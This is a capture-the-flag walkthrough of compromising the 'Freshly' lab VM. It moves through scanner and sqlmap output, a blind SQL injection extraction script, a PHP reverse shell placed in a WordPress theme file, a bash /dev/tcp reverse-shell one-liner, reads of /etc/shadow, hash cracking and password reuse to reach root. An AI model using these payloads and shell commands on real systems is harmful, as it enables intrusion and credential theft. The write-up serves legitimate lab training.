Enumeration
After spinning up the VM in VirtualBox, I located its DHCP address on my local NAT network and had at it:
root@kali:~# nmap -A 10.1.1.11
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-22 21:09 EDT
Nmap scan report for 10.1.1.11
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after: 2025-02-14T03:30:05+00:00
|_ssl-date: 1901-12-13T20:45:52+00:00; -113y160d4h24m13s from local time.
8080/tcp open http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 10.1.1.11
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds
root@kali:~#
______________________________________________________________________________
A quick look at some of the hosted web pages brought this challenge close to my geek heart.
Paying heed to the Jedi Mind Trick, I pushed forward.
Continuing with my normal enumeration process, I used Nikto to identify any low-hanging fruit or interesting directories.
Note the /login.php hit on port 80 in the output below; I initially overlooked it, which cost me time later.
root@kali:~# nikto -h 10.1.1.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.11
+ Target Hostname: 10.1.1.11
+ Target Port: 80
+ Start Time: 2015-05-22 23:47:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6732 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2015-05-22 23:48:12 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#
______________________________________________________________________________
Needing more information, I turned to DirBuster to map the site's structure and find any hidden pages. I quickly found a WordPress install hosted on both port 443 and port 8080.
At this point I was starting to get happy, given the rich supply of WordPress vulnerabilities out there. I turned to WPScan to enumerate users and look for known plugin vulnerabilities:
root@kali:~# wpscan --url 10.1.1.11:8080/wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.6
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://10.1.1.11:8080/wordpress/
[+] Started: Fri May 22 21:41:21 2015
[!] The WordPress 'http://10.1.1.11:8080/wordpress/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'http://10.1.1.11:8080/wordpress/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] XML-RPC Interface available under: http://10.1.1.11:8080/wordpress/xmlrpc.php
[+] WordPress version 4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
| 4 plugins found:
[+] Name: cart66-lite - v1.5.3
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt
[!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7737
Reference: https://research.g0blin.co.uk/g0blin-00022/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4
[+] Name: contact-form-7 - v4.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt
[+] Name: proplayer - v4.7.9.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/readme.txt
[!] Title: ProPlayer 4.7.9.1 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/6912
Reference: http://osvdb.org/93564
Reference: http://www.exploit-db.com/exploits/25605/
[+] Name: all-in-one-seo-pack - v2.2.5.1
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | admin | admin |
+----+-------+-------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Fri May 22 21:41:28 2015
[+] Memory used: 3.234 MB
[+] Elapsed time: 00:00:06
root@kali:~#
_____________________________________________________________________________
OK, there are a couple of SQL injections here. The one in the Cart66 Lite plugin requires credentials, which I didn't have yet.
The ProPlayer injection plainly didn't work for me.
I also tried to brute force the admin user's password, unsuccessfully. I must have overlooked something. Going back through my notes, I found the login.php page in my Nikto output.
Browsing to it, I found a simple login page that had SQL injection written all over it.
I tried a handful of SQL injection strings; the author of the VM helped out a bit by printing a 1 or 0 on the page depending on whether the login query matched, which is a perfect boolean oracle.
A series of single quotes revealed an underlying MySQL database on the server. Sounds like a job for sqlmap:
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:53:02
[23:53:02] [INFO] resuming back-end DBMS 'mysql'
[23:53:02] [INFO] testing connection to the target URL
[23:53:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:53:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:53:03] [INFO] fetching database names
[23:53:03] [INFO] fetching number of databases
[23:53:03] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[23:53:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
7
[23:53:19] [INFO] retrieved:
[23:53:24] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[23:54:35] [INFO] retrieved: login
[23:54:58] [INFO] retrieved: mysql
[23:55:18] [INFO] retrieved: performance_schema
[23:56:29] [INFO] retrieved: phpmyadmin
[23:57:13] [INFO] retrieved: users
[23:57:32] [INFO] retrieved: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080
[23:58:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'
[*] shutting down at 23:58:32
root@kali:~#
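To make that 1/0 oracle concrete, here is an added example (my own code, not the page's login.php, whose query is never shown, and not sqlmap's). It builds a throwaway SQLite stand-in for the login back end with an assumed users(user_name, password) table and a seeded admin row, shows the assumed string-concatenated query beside a parameterised fix, and then recovers the password character by character with the same bisection sqlmap performs, using the visible 1/0 instead of the SLEEP() timing sqlmap fell back to above. SQLite has no SLEEP(), so the time-based variant is not reproduced.

```python
import sqlite3

# Added example: constructed stand-in for the VM's login.php and the boolean
# oracle it exposed (a 1 or 0 printed depending on whether the query matched).
# The table name, columns and seeded row are assumptions; the real box ran
# MySQL and its login query is not shown on the page.
SEED_USER = "admin"
SEED_PASSWORD = "SuperSecretPassword"


def make_db():
    """In-memory SQLite database seeded with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (SEED_USER, SEED_PASSWORD))
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """Assumed shape of the original query: inputs pasted straight into the
    SQL string. Returns 1 if a row matched, else 0, like the page on the VM."""
    sql = ("SELECT COUNT(*) FROM users WHERE user_name='%s' AND password='%s'"
           % (user, password))
    return 1 if conn.execute(sql).fetchone()[0] > 0 else 0


def login_fixed(conn, user, password):
    """Hardened version: bound parameters keep the inputs out of the SQL
    grammar, so a quote in the input is just a character in a string."""
    sql = "SELECT COUNT(*) FROM users WHERE user_name=? AND password=?"
    return 1 if conn.execute(sql, (user, password)).fetchone()[0] > 0 else 0


class BlindOracle:
    """Asks the login form yes/no questions. The payload closes the user_name
    literal, ANDs in our condition and comments out the password clause, so
    the 1/0 on the page answers the condition for the known user's row."""

    def __init__(self, login, conn, known_user=SEED_USER):
        self.login, self.conn, self.known_user = login, conn, known_user
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        payload = "%s' AND (%s) -- " % (self.known_user, condition)
        return self.login(self.conn, payload, "irrelevant") == 1


def bisect(oracle, predicate, lo, hi):
    """Smallest v in [lo, hi] for which predicate(v) ('x > v') is false,
    i.e. the hidden value itself. Costs about log2(hi - lo) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(predicate(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(oracle, max_len=64):
    """Recover the known user's password one character at a time: first the
    length, then each character by bisecting its code point."""
    length = bisect(oracle, lambda v: "length(password) > %d" % v, 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = bisect(
            oracle,
            lambda v, p=pos: "unicode(substr(password, %d, 1)) > %d" % (p, v),
            32, 126)  # printable ASCII, an assumption for the example
        chars.append(chr(code))
    return "".join(chars)


def classic_bypass(login, conn):
    """The textbook auth bypass: comments out the password check entirely."""
    return login(conn, "' OR 1=1 -- ", "anything")


if __name__ == "__main__":
    db = make_db()
    weak = BlindOracle(login_vulnerable, db)
    print("bypass against vulnerable login:", classic_bypass(login_vulnerable, db))
    print("recovered:", extract_password(weak), "in", weak.requests, "requests")
    hard = BlindOracle(login_fixed, db)
    print("bypass against fixed login:", classic_bypass(login_fixed, db))
    print("recovered from fixed login:", repr(extract_password(hard)))
```

Against the vulnerable function the whole 19-character password comes back in well under 200 requests; against the parameterised version every question is answered "no", the inferred length is 0 and nothing is recovered. That difference, not input filtering, is the fix for login.php.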
_______________________________________________________________________________
Poking around in each database with sqlmap, I ultimately found the WordPress admin account. Note that it sits in a separate users table in wordpress8080 with a plaintext password, not in the standard wp_users table, where WordPress would store a salted phpass hash:
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" -D wordpress8080 --dump
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:46:07
[23:46:07] [WARNING] using '/root/.sqlmap/output' as the output directory
[23:46:07] [INFO] testing connection to the target URL
[23:46:07] [INFO] heuristics detected web page charset 'ascii'
[23:46:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:46:08] [INFO] target URL is stable
[23:46:08] [INFO] testing if POST parameter 'user' is dynamic
[23:46:08] [WARNING] POST parameter 'user' does not appear dynamic
[23:46:08] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[23:46:08] [INFO] testing for SQL injection on POST parameter 'user'
[23:46:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:46:09] [INFO] testing 'MySQL inline queries'
[23:46:09] [INFO] testing 'PostgreSQL inline queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[23:46:09] [INFO] testing 'Oracle inline queries'
[23:46:09] [INFO] testing 'SQLite inline queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[23:46:19] [INFO] POST parameter 'user' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[23:46:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:46:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:46:20] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[23:46:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[23:46:23] [INFO] testing 'Generic UNION query (88) - 1 to 20 columns'
[23:46:23] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:46:45] [INFO] fetching tables for database: 'wordpress8080'
[23:46:45] [INFO] fetching number of tables for database 'wordpress8080'
[23:46:45] [INFO] retrieved:
[23:46:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
1
[23:46:54] [INFO] retrieved:
[23:47:04] [INFO] adjusting time delay to 1 second due to good response times
users
[23:47:21] [INFO] fetching columns for table 'users' in database 'wordpress8080'
[23:47:21] [INFO] retrieved: 2
[23:47:23] [INFO] retrieved: username
[23:47:53] [INFO] retrieved: password
[23:48:28] [INFO] fetching entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] fetching number of entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] retrieved: 1
[23:48:29] [INFO] retrieved: SuperSecretPassword
[23:49:44] [INFO] retrieved: admin
[23:50:03] [INFO] analyzing table dump for possible password hashes
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+
[23:50:03] [INFO] table 'wordpress8080.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.11/dump/wordpress8080/users.csv'
[23:50:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'
[*] shutting down at 23:50:03
root@kali:~#
________________________________________________________________________________
Let's use the newfound credentials on the WordPress login page:
Bingo:
Now, I have used multiple ways to get a shell while hacking WordPress, often uploading a plugin that allows file types to be uploaded when .php extensions are blocked. Yes, that was the case here as well. (The Cart66 SQL injection exploit may also work now that we have credentials.) However, a good friend brought the obvious to my attention: "Why go through the trouble of uploading a plugin, potentially leaving tracks, when you can just edit an existing theme page within WordPress and drop in your own PHP code?" I had no logical answer. So I did that, and it was much easier.
For those of you familiar with Kali, there are web shells for most of your needs in the following directory:
/usr/share/webshells/php
Penetration
The php-reverse-shell.php there is identical to the one published by pentestmonkey. I simply pasted the contents of the file over the active theme's 404.php using the WordPress theme editor.
Two lines in the shell need to be changed to match your attacking machine's address and the port your listener will be on:
$ip = '10.1.1.5'; // CHANGE THIS
$port = 1234; // CHANGE THIS
After starting a netcat listener on port 1234 and browsing to the now-malicious 404.php page, the reverse shell connects back:
Now that we have a limited shell, we'll want to upgrade it to a proper interactive TTY. Whenever possible, I use the following Python PTY spawn:
python -c 'import pty; pty.spawn("/bin/bash")'
Here are a couple of other valuable one-liners, since Python won't always be at your disposal. The first is a bash reverse shell over /dev/tcp (point it at your own listener's address and port); the second simply starts an interactive sh:
bash -i >& /dev/tcp/192.168.22.10/443 0>&1
/bin/sh -i
...and, for a more durable foothold, generating an SSH key pair and appending the public key to ~/.ssh/authorized_keys on the victim; more on this in a separate write-up.
Once I had a decent shell, things moved pretty quickly because of the permissions on /etc/shadow: it was readable by the unprivileged daemon account the web shell was running as, which is a serious misconfiguration on its own:
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@Freshly:/$
daemon@Freshly:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/$
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$
___________________________________________________________________
This was probably enough to satisfy the requirements of the challenge, but I continued.
I ran John the Ripper against the shadow hashes with my favourite wordlist and cracked the candycane account.
I probably didn't need to, but I logged in as the cracked user "candycane".
Running an enumeration script, I found that the login.php file had database credentials hard-coded in it:
candycane@Freshly:/var/www/html$ cat login.php
cat login.php
mysql_connect('localhost','root','SuperSecretPassword');
mysql_select_db('login');
?>
The same password as the WordPress admin. Nobody reuses passwords like that... yeah, right.
So I logged in as the MySQL root user with these credentials and enumerated a bit more:
candycane@Freshly:/var/www/html$ mysql --user=root --password=SuperSecretPassword wordpress8080
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4886
Server version: 5.5.41-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| login |
| mysql |
| performance_schema |
| phpmyadmin |
| users |
| wordpress8080 |
+--------------------+
7 rows in set (0.00 sec)
mysql> show tables from login;
show tables from login;
+-----------------+
| Tables_in_login |
+-----------------+
| user_name |
| users |
+-----------------+
2 rows in set (0.00 sec)
mysql> use login;
use login;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from users;
select * from users;
+-----------+----------+
| user_name | password |
+-----------+----------+
| candyshop | password |
| Sir | PopRocks |
+-----------+----------+
2 rows in set (0.00 sec)
mysql>
______________________________________________________________________________
So this yielded a little more information. I chose not to continue enumerating and instead tried the same reused password against the system root account, and bingo!
I pwned the box:
Overall, I enjoyed this VM challenge due to its realism. Some challenges are fun and thought-provoking, but I enjoy the ones that mimic real-world systems and human mistakes: password reuse across the web app, the database and the OS, credentials hard-coded in source, and a shadow file readable by an unprivileged user. Thanks to the guys at Top-Hat-Sec.
Court Graham, CISSP, OSCP, CEH, PCI-QSA, ITIL